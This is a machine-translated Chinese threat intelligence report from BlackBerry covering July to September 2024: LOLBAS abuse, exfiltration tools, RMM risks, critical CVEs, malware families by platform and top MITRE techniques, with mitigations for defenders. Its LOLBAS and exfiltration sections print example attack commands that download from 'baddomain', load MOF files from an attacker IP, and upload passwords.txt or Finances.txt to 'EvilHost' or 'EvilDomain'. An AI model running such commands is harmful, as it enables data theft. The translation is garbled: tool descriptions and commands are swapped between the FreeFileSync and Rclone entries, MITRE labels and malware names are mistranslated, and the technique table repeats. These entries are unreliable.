2024 年 7 月,黑莓研究人员发现了一个 部署 Coyote 以巴西银行和加密货币交易所为目标的 活动 。以地理位置为目标的银行木马呈上升趋势,这强调了强大的网络安全和用户教育的必要性,以打击像 Coyote 这样的网络钓鱼和社交工程威胁。在本报告的 "缓解措施 "部分,您将发现更多可在组织内部分享的可行安全理念。

CylanceMDR:威胁与缓解措施

组织面临的威胁不仅来自威胁者的恶意软件,还来自合法工具的滥用。本节重点介绍 CylanceMDR™ 团队本季度在客户网络环境中遇到的最普遍威胁,以及组织可用于加强网络防御的缓解措施。

CylanceMDR是我们基于订阅的 MDR 服务,提供全天候监控,通过填补安全环境中的空白,帮助组织阻止复杂的网络威胁。

LOLBAS 活动

LOLBAS 活动

LOLBAS 是指攻击者可以出于恶意目的滥用的内置 Windows 系统工具和合法可执行文件。所谓 "就地取材",是指使用目标环境("地")中已有的工具,而不是冒险引入新的恶意软件,因为新的恶意软件可能会触发安全系统并提醒目标已被入侵。基于 LOLBAS 的攻击的危险性在于它们能够绕过安全控制,因为它们使用的是合法的系统工具。这就给检测带来了挑战,因为系统活动乍一看可能是正常的。

在本报告所述期间,观察到以下 LOLBAS 活动:

  • Bitsadmin 仍然是被观察最多的 LOLBAS。
  • Certutil 的使用率位居第二,但自上一报告期以来有所下降。
  • 此外,还观察到 Regsvr32、MSHTA 和 PsExec,但在总体活动中所占比例较低。

下面,我们举例说明恶意使用 LOLBAS 的情况。

图 14:2024 年 7 月至 9 月的 LOLBAS 活动。

文件: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

文件: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

渗透工具

渗透工具

渗透工具是用于将数据传输出目标环境的软件,通常用于恶意目的。本季度,CylanceMDR 团队审查了客户环境中最常见的可用于外渗的工具(不包括 RMM 工具)。

图 15:2024 年 7 月至 9 月被滥用的外泄工具百分比。

WinSCP

说明WinSCP 是一款文件传输客户端;PuTTY 是一款安全外壳(SSH)客户端。

命令行示例:winscp.exe scp://test:P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

:常用于图形用户界面(GUI)。

斜切工具 ID:T1048

PSCP

描述PuTTY Secure Copy Protocol(PSCP)是一款用于传输文件和文件夹的命令行工具。

命令行示例: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

斜切接头 ID:T1021.004T1021.004

FileZilla

简介FileZilla 是一款著名的文件传输协议 (FTP) 工具,可用于各种操作系统。

命令行示例:filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

斜切铆钉和铆钉 ID:T1071.002T1071.002

FreeFileSync

描述PuTTY Secure Copy Protocol(PSCP)是一款用于传输文件和文件夹的命令行工具。

命令行示例:pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

斜切接头 ID:T1021.004T1021.004

Rclone

说明FreeFileSync 是一款同步工具,可用于管理备份。

命令行示例:FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

斜切工具 ID:T1567.002T1567.002

远程监控和管理工具

远程监控和管理工具

威胁行为者滥用 RMM 工具。这些工具为攻击者提供了一种简便的方法来保持对系统的持久、简单访问,并提供了一种有效的数据外渗手段。正如我们之前的《全球威胁情报报告》所指出的,这是勒索软件组织增长最快的类别,他们利用这些工具从受害者环境中窃取数据。在本报告所述期间,CylanceMDR 团队查看了客户环境中最常被利用的 RMM 工具。

在分析过程中,我们注意到许多客户在其环境中使用多种 RMM 工具,从而增加了组织的攻击面和风险。

图 16:该图表说明了通过滥用主要 RMM 工具实施攻击的百分比。

 

建议采取的缓解措施包括

1.审计远程访问工具

  • 确定组织内当前使用的 RMM 工具。
  • 确认它们在环境中得到批准。
  • 如果使用多种 RMM 工具,确定是否可以合并。减少使用不同工具的数量可降低风险。

2.禁用端口和协议

  • 阻止与未经批准的远程访问工具相关的常用端口的入站和出站网络通信。
  • 在防火墙规则和应用程序控制方面,使用默认的拒绝规则和允许列表,而不是阻止列表方法。

3.监控端点活动和网络流量

  • 检测远程访问工具的异常使用。

4.修补

  • 确保定期审查与允许使用的 RMM 工具相关的漏洞,并在必要时进行更新。
  • 在执行定期补丁周期时,优先考虑可访问互联网的系统。

5.网络分割

  • 通过分割网络、限制对设备和数据的访问,最大限度地减少恶意横向移动。

6.设备标签

  • 了解您的安全供应商是否提供标记使用 RMM 工具的设备的选项。如果有,请启用此选项,以确保您的 SOC 具有可见性。有些供应商提供的选项可留下备注/标记,以识别经批准的工具/活动,这对分析人员在调查过程中大有裨益。

7.内存加载 RMM

  • 使用能检测到只在内存中加载的远程访问的安全软件。

CylanceMDR 季度最大威胁

CylanceMDR 分析小组在本报告所述期间发现并应对的最普遍威胁如下。
图 17:本季度CylanceMDR 分析师团队发现和应对的最普遍威胁。
图 17:本季度CylanceMDR 分析师团队发现和应对的最普遍威胁。

亮点:黑莓事件响应小组发出的警报

BlackBerry 事件响应 (IR) 团队为遭受恶意软件攻击或疑似数据泄露的组织提供缓解措施。本季度,我们的 IR 团队发现,涉及互联网连接服务和滥用前员工凭证的攻击事件有所增加。

本季度,VPN 设备等面向互联网的设备比往常更容易成为攻击目标。不幸的是,这些设备可能没有足够的多因素身份验证。在某些情况下,由于缺乏多因素身份验证,威胁者得以在客户环境中部署勒索软件或其他恶意软件,并外泄公司数据。这突出表明,企业需要及时妥善保护所有暴露在互联网上的系统(MITRE - 外部远程服务),并尽可能利用零信任网络访问 (ZTNA) 解决方案等现代替代方案减少攻击面。

滥用前员工的账户凭证是另一种常见的漏洞。虽然一旦员工离职,就应立即删除其账户凭证,但这种情况并不总是发生。旧账户有可能让威胁者完全访问组织的网络和系统。因此,公司有必要在所有系统中实施强大的身份验证安全控制(MITRE - 有效账户)。

常见漏洞和风险

影响和统计数据

通用漏洞和暴露(CVEs)系统提供了一个用于识别、规范和公布已知安全漏洞和暴露的框架。从 2024 年 7 月到 9 月,美国国家标准与技术研究院(NIST)报告了 8659 个新的 CVE。

尽管本季度发现的CVE比上季度有所减少,但这些CVE的严重程度却显著提高。上一季度,8% 的 CVE 的严重性达到或超过 9.0 分,而本季度这一比例上升到 14% 的新高。

图 18:2024 年 7 月至 9 月的 CVE 评分。

本季度记录的最重要的 CVE:

CVE-2024-4879 (9.3 严重) 任意代码执行:此 ServiceNow 漏洞允许未经身份验证的用户在 Now Platform 中远程执行代码。它涉及利用 ServiceNow UI 宏的 Jelly 模板注入漏洞。此漏洞有可能与CVE-2024-5178 (6.9 Medium) 未授权访问和 CVE-2024-5217 (9.2 Critical) 任意代码执行连锁,在 ServiceNow MID 服务器上实现未授权远程代码执行。

CVE-2024-43491 (9.8 严重) 任意代码执行:该漏洞与 Microsoft 的服务栈有关,重新引入了 Windows 10 中先前已缓解的漏洞。该漏洞允许在无用户交互的情况下远程执行代码,可能导致整个系统被入侵。已发布服务栈更新和 Windows 安全更新来修补此漏洞。

CVE-2024-38194 (9.9 严重) 身份验证绕过:此漏洞源于 Azure 网络应用程序中的不当授权,允许通过身份验证的攻击者通过网络提升权限。如果被利用,可能会危及应用程序和连接系统的安全,导致未经授权的数据访问、服务中断或恶意修改应用程序行为。

CVE-2024-21416 (9.8 严重) 任意代码执行:此漏洞與 Windows TCP/IP 遠端執行程式碼 (RCE) 漏洞有關,攻擊者可利用此漏洞在目標系統上執行任意程式碼,並可能取得完整存取權限。

CVE-2024-47575 (9.8 Critical) 身份验证绕过:在报告期外披露的名为 "FortiJump "的漏洞,被追踪为CVE-2024-47575,涉及新披露的威胁行为者UNC5820的零日攻击。它滥用了执行 API 命令的缺陷,允许攻击者绕过身份验证并在可利用系统上执行命令。Fortinet 在 10 月份发布的公告中指出,该漏洞 "可能允许远程未认证攻击者通过特制请求执行任意代码或命令"。

按平台划分的普遍威胁:视窗

FakeUpdates/SocGholish

下载器

基于 JavaScript 的下载程序,可向用户提供虚假的浏览器更新。已知可下载其他有效载荷,包括 AZORult、GootLoader 和 RedLine。

Formbook/xLoader

信息窃取者    

复杂的恶意软件,既是信息窃取程序,又是下载程序。利用反虚拟机技术、进程注入和自定义加密程序绕过网络安全防御系统。从浏览器、电子邮件客户端和各种应用程序中窃取数据。

QakBot

僵尸网络/下载器

于 2008 年首次发现,现为 5.0 版本。提供广泛的数据渗透和横向移动能力。安装后可传播多种恶意软件。

特斯拉特工

信息窃取者

基于 .NET 的信息窃取程序,作为 MaaS 出售,主要用于获取凭证。尽管 2023 年 FBI/DOJ 基础设施被攻破,但它凭借新的持久性机制再次出现,在主机恢复后仍能存活。

njRAT

远程访问木马

RAT 专注于捕获用户数据,其功能包括摄像头访问、凭证窃取、文件交互监控和按键记录。

AsyncRAT

远程访问木马

通常与其他恶意软件一起发送。接收 C2 服务器命令,获取用户数据并终止特定进程。具有僵尸网络功能。

LummaC2

信息窃取者

基于 C 语言的信息窃取程序,以商业企业和关键基础设施组织为目标。重点是敏感数据外泄,通过地下论坛和 Telegram 群组传播。

雷姆科斯

远程访问木马

远程控制和监视应用程序,专为未经授权的远程访问和设备控制而设计。

红线

信息窃取者

利用各种应用程序和服务外泄受害者数据,包括信用卡信息、密码和 cookies。

Phorpiex

僵尸网络

专注于恶意软件交付的僵尸网络,以参与 X 级勒索活动而闻名。

按平台划分的普遍威胁:Linux

未来

僵尸网络

仍然非常活跃,最新版本利用了闭路电视摄像头的零日漏洞。Corona "变种通过在被入侵的摄像头中注入恶意代码进行传播。

加夫吉特/巴什莱特

僵尸网络

以物联网为重点的 Linux 僵尸网络使用 C2 服务器进行大规模 DDoS 攻击。最新版本针对的是 GPU 加密挖矿的 SSH 弱密码。

播放勒索软件

勒索软件

专门针对 ESXi 环境的新变种,标志着该组织从之前以 Windows 为重点的双重勒索攻击首次扩展到 Linux 系统。选择性加密 Linux ESXi 环境中的文件。

哈杜肯

僵尸网络

新型 Linux 恶意软件将加密挖矿功能与 DDoS 攻击工具相结合。目标是包括 Oracle WebLogic Server 在内的系统漏洞。

按平台划分的普遍威胁:MacOS

原子窃取器(AMOS)

信息窃取者

新变种伪装成各种应用程序,通过 DMG 磁盘映像分发。目标包括密码、浏览器 cookie、自动填充数据、加密钱包和 Mac 钥匙串数据。

Chtulu

信息窃取者

基于 MaaS 的信息窃取程序,以木马 DMG 的形式分发。感染后的活动包括获取钥匙串密码、浏览器 cookie、Telegram 账户信息、加密货币钱包和用户数据供 C2 服务器上传。

Macma

后门

最近的更新归功于中国 APT 组织 Evasive Panda。在向 C2 服务器部署键盘记录器和媒体捕获功能以进行数据外渗之前,先建立持久性。

TodoSwift

下载器

通过比特币定价 PDF 诱饵分发。归属于朝鲜组织 BlueNoroff,可通过 C2 服务器连接下载其他恶意二进制文件。

按平台划分的普遍威胁:安卓

亡灵木马

下载器

通过 Google Play 商店和恶意软件开发工具包 (SDK) 散布。功能包括启动隐形广告、下载附加有效载荷、安装第三方应用程序、执行附加代码和 C2 服务器通信。

Octo2

信息窃取者

通过木马化版本的 NordVPN 和 Google Chrome 浏览器传播。Exobot 变种,主要针对银行账户信息,具有远程访问功能和 C2 服务器通信功能。

阿吉纳

信息窃取者

通过社交工程和网络钓鱼传播,尤其是通过 Telegram。窃取银行凭证和短信数据,拦截银行应用程序的 2FA 身份验证。

MITRE 常用技术

了解威胁组织的高级技术有助于决定优先使用哪些检测技术。在本报告所述期间,黑莓观察到威胁行为者使用了以下 20 种技术。

图 19:2024 年 6 月至 9 月观察到的前 20 种 MITRE 技术。

检测到的技术

下表显示了本季度威胁行为者使用的前 20 种技术。变化 "一栏中的向上箭头(↑)表示该技术的使用率自上次报告以来有所增加。向下箭头(↓)表示自上次报告以来该技术的使用率有所下降。等号(=)表示该技术与上次报告中的位置相同。

技术名称 技术 ID 战术名称 最新报告 改变
劫持执行流程
T1574
持久性、特权升级、防御规避
1
=
DLL 侧加载
T1574.002
持久性、特权升级、防御规避
2
=
虚拟化/
沙盒规避
T1497
辩护回避,发现
NA
发现系统信息
T1082
发现
5
输入捕捉
T1056
凭证访问,收集
4
软件发现
T1518
发现
6
=
发现安全软件
T1518.001
发现
7
=
预定任务/工作
T1053
执行、持久性、权限升级
19
DLL 搜索顺序劫持
T1574.001
持久性、特权升级、防御规避
NA
工艺注入
T1055
逃避辩护、特权升级
3
伪装
T1036
防御回避
10
过程探索
T1057
发现
8
创建或修改系统流程
T1543
持久性、特权升级
NA
视窗服务
T1543.003
持久性、特权升级
NA
启动或登录自动启动执行
T1547
持久性、特权升级
14
注册表运行键值/启动文件夹
T1547.001
持久性、特权升级
15
文件和目录发现
T1083
发现
9
远程系统发现
T1018
发现
13
命令和脚本解释器
T1059
执行
NA
损害防御
T1562
防御回避
17
技术 ID
劫持执行流程
T1574
DLL 侧加载
T1574.002
虚拟化/
沙盒规避
T1497
发现系统信息
T1082
输入捕捉
T1056
软件发现
T1518
发现安全软件
T1518.001
预定任务/工作
T1053
DLL 搜索顺序劫持
T1574.001
工艺注入
T1055
伪装
T1036
过程探索
T1057
创建或修改系统流程
T1543
视窗服务
T1543.003
启动或登录自动启动执行
T1547
注册表运行键值/启动文件夹
T1547.001
文件和目录发现
T1083
远程系统发现
T1018
命令和脚本解释器
T1059
损害防御
T1562
战术名称
劫持执行流程
持久性、特权升级、防御规避
DLL 侧加载
持久性、特权升级、防御规避
虚拟化/
沙盒规避
辩护回避,发现
发现系统信息
发现
输入捕捉
凭证访问,收集
软件发现
发现
发现安全软件
发现
预定任务/工作
执行、持久性、权限升级
DLL 搜索顺序劫持
持久性、特权升级、防御规避
工艺注入
逃避辩护、特权升级
伪装
防御回避
过程探索
发现
创建或修改系统流程
持久性、特权升级
视窗服务
持久性、特权升级
启动或登录自动启动执行
持久性、特权升级
注册表运行键值/启动文件夹
持久性、特权升级
文件和目录发现
发现
远程系统发现
发现
命令和脚本解释器
执行
损害防御
防御回避
最新报告
劫持执行流程
1
DLL 侧加载
2
虚拟化/
沙盒规避
NA
发现系统信息
5
输入捕捉
4
软件发现
6
发现安全软件
7
预定任务/工作
19
DLL 搜索顺序劫持
NA
工艺注入
3
伪装
10
过程探索
8
创建或修改系统流程
NA
视窗服务
NA
启动或登录自动启动执行
14
注册表运行键值/启动文件夹
15
文件和目录发现
9
远程系统发现
13
命令和脚本解释器
NA
损害防御
17
改变
劫持执行流程
=
DLL 侧加载
=
虚拟化/
沙盒规避
发现系统信息
输入捕捉
软件发现
=
发现安全软件
=
预定任务/工作
DLL 搜索顺序劫持
工艺注入
伪装
过程探索
创建或修改系统流程
视窗服务
启动或登录自动启动执行
注册表运行键值/启动文件夹
文件和目录发现
远程系统发现
命令和脚本解释器
损害防御

突出的对抗技术

本季度,劫持执行流(T1574)成为对手使用最多的技术,其子技术 DLL 侧加载(T1574.002)排名第二。这些方法涉及攻击者操纵操作系统执行程序的方式,如侧载 DLL,通常是为了绕过安全系统。

此外,值得注意的是,虚拟化/沙盒规避(T1497)技术进入了前三名。这表明,攻击者使用的恶意软件具有很强的反检测能力,这一点从为得出这些结论而研究的二进制文件中可以看出。

检测到的战术

如图 20 所示,本季度排名前三的战术分别是防御规避特权升级持久性

 

图 20:MITRE ATT&CK 战术,2024 年 6 月至 9 月

展望未来

本报告为期 90 天,涵盖 2024 年 7 月至 9 月,旨在帮助您随时了解未来威胁并做好准备。备受瞩目的犯罪团伙,尤其是勒索软件运营商,正在利用新的漏洞,在大小目标中寻找价值。报告指出,黑莓研究人员仅在本季度就观察到近两百万次攻击。如此频繁的活动使得了解行业和地区的最新安全新闻变得至关重要。

以下是未来几个月的预期:

被围困的电信

2024 年,电信行业成为主要攻击目标,美国电话电报公司(AT&T)的漏洞事件就是一例,该事件泄露了其网络中的通话和短信记录。进入 2025 年,我们预计攻击者将越来越多地以电信基础设施而非单个设备为攻击目标,从而使他们能够大规模拦截通信。Salt Typhoon 事件表明,老练的攻击者可以利用网络层的漏洞绕过传统的安全措施。从针对特定设备的恶意软件到基础设施级攻击的这一转变提出了严峻的挑战,因为企业现在必须重新思考如何在公共电信网络上确保敏感通信的安全。

黑市上的信息窃取者和被盗数据

在整个 2024 年,信息窃取者一直是我们季度威胁报告的主要特征。臭名昭著的信息窃取者经常在我们的顶级威胁名单中名列前茅,并多次出现在全球各地的攻击事件中。据国际刑警组织称,2023 年,暗网销售从信息窃取者那里收集的日志的数量增加了 40%。进入 2025 年,预计这一数字还会上升。

补丁和漏洞利用

威胁行为者(尤其是勒索软件团伙)利用未披露或新发现的漏洞并非新现象。然而,这些 CVE 漏洞被利用的速度之快,让 IT 专业人员越来越难以跟上。在我们这个拥有无数流程、应用程序和服务的超级互联世界中,情况尤其如此。网络犯罪分子意识到了这一点,并积极寻求利用企业 IT 基础设施和安全方面的任何弱点来获取利益。

在本报告所述期间,超过 50% 的新 CVE 得分超过 7.0。预计在新的一年里,CVE 的快速利用和概念验证 (PoC) 的武器化仍将是业界面临的重大挑战。

勒索软件改名换姓和重新出现

在过去的几十年里,执法部门和网络安全专业人员一直在与勒索软件开发商和关联公司玩猫捉老鼠的游戏。然而,正如我们在有关 Lynx 勒索软件的章节中提到的,大多数勒索软件集团都是其他勒索软件集团的混合体,通常会重塑品牌并使用其他勒索软件代码,或从其他恶意软件作者那里购买恶意代码库。随着进入网络犯罪领域的门槛不断降低,这种重塑品牌、重新出现和重复使用勒索软件的趋势很可能会继续下去。

朝鲜远程工作者和虚假身份

据报道,朝鲜间谍试图冒充远程工作人员渗透西方 IT 公司。这些网络犯罪分子精心制作了虚假身份,展示了通过求职面试和测试所需的技能,并掩盖了自己的地理位置,以避免显示为朝鲜人。在某些情况下,他们使用了深度伪造技术。一旦被录用,他们就会试图渗出内部数据并安装远程访问工具。

我们预测,这种伪造身份渗透组织的趋势将持续到 2025 年。朝鲜很可能已经部署了更多尚未被发现的秘密特工,而且他们很可能会不断改进战术,以更好地躲避侦查。

访问 黑莓博客了解最新的网络安全威胁和防御措施。

法律声明

BlackBerry Global Threat Intelligence Report 中包含的信息仅供参考之用。对于本报告中引用的任何第三方声明或研究的准确性、完整性和可靠性,BlackBerry 不作任何保证,也不承担任何责任。本报告中的分析反映了我们的研究分析人员目前对现有信息的理解,可能会随着我们了解到的更多信息而发生变化。读者有责任在其私人和职业生活中应用这些信息时进行尽职调查。BlackBerry 不允许恶意使用或滥用本报告中提供的信息。